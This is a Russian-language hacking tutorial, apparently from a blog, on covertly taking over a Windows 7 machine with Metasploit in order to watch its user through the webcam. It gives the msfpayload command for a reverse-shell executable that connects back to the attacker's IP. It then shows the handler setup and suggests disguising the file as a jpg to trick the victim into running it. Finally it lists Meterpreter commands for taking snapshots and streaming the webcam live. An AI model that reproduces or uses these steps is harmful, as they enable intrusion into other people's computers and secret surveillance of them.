Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль!
Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать:
Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
- LHOST=192.168.1.5 – IP-адрес атакующего
- LPORT=4444 – порт атакующего
Запускаем Metasploit:
# msfconsole
Далее вводим команды:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit
Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать тут. Это не единственный вариант, поэтому вооружайтесь googl’ом.
После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.
Сначала посмотрим, есть ли вообще у него web-камера?
meterpreter > webcam_list
1: Logitech Webcam 120
Да нам повезло! Имеется одна web-камера: Logitech Webcam 120.
Теперь сделаем снимок:
meterpreter > webcam_snap
Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:
meterpreter > run webcam -p /var/www
После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:
/var/www/webcam.html